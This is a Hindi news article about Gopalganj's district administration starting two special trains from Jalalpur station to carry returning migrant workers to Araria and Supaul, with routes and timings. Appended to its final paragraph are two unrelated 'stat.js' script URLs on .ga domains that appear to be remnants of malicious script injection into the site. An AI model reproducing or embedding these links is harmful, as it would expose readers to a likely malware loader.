बिहार के प्रवासी मजदूर हजारों की संख्या में दूसरे राज्यों से बिहार लौट रहे इन मजदूरों को अपने घर भेजने के लिए जिला प्रशासन द्वारा सैकड़ों बसें चलाई जा रही है लेकिन जिला प्रशासन में मजदूरों के लिए बड़ी सहूलियत का ऐलान किया है।

क्योंकि बिहार के गोपालगंज जिले के सीमा पर प्रतिदिन 8 से 10 हज़ार लोग वापस लौटते देखे जा सकते हैं इसको देखते हुए शुक्रवार को गोपालगंज के डीएम अरशद अजीज ने कुचायकोट के जलालपुर स्थित रेलवे स्टेशन पर पहुंचकर वाराणसी मंडल के डीआरएम के साथ बैठक की बैठक के बाद घोषणा किया गया जलालपुर स्टेशन से 2 श्रमिक स्पेशल ट्रेनें चलाई जाएंगी।

 

यह ट्रेन प्रतिदिन जलालपुर से खुलेंगी। एक ट्रेन जलालपुर से अररिया के लिए यह ट्रेन रोजाना सुबह 9:30 बजे जलालपुर से छपरा हाजीपुर बरौनी कटिहार होते हुए अररिया रात को 8:45 में पहुंचेगी यही ट्रेन रात को करीब 11:30 बजे वापस जलालपुर लौटेगी वापस ट्रेन अगले दिन सुबह 10:45 जलालपुर लौटेगी।

जबकि दूसरी ट्रेन 11:45 में जलालपुर से सुपौल जिले के लिए निकलेगी। इस ट्रेन का रूट कुछ इस प्रकार है जलालपुर से खुलकर चपरा समस्तीपुर खगड़िया और सहरसा होते हुए सुपौल में यह ट्रेन रात 9:30 बजे पहुंचेगी फिर वहां से रात 11:30 बजे वापस लौटेगी।

 

 

गोपालगंज के डीएम के दिए हुए बयान के अनुसार अगर मजदूरों की संख्या बढ़ती है तो ट्रेनों की संख्या में बढ़ोतरी की जाएगी अभी फिलहाल इसे ट्रायल पर चलाया जा रहा है. फिलहाल अन्य राज्यों से आ रहे मजदूरों को बिहार के बॉर्डर पर स्क्रीनिंग की जा रही है एवं उन्हें जिला प्रशासन द्वारा आवंटित बसों से उनके गृह जिले भेजे जा रहे अगर ट्रेन परिचालन शुरू होता है तो बसों के परिचालन में कमी आने की उम्मीद है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.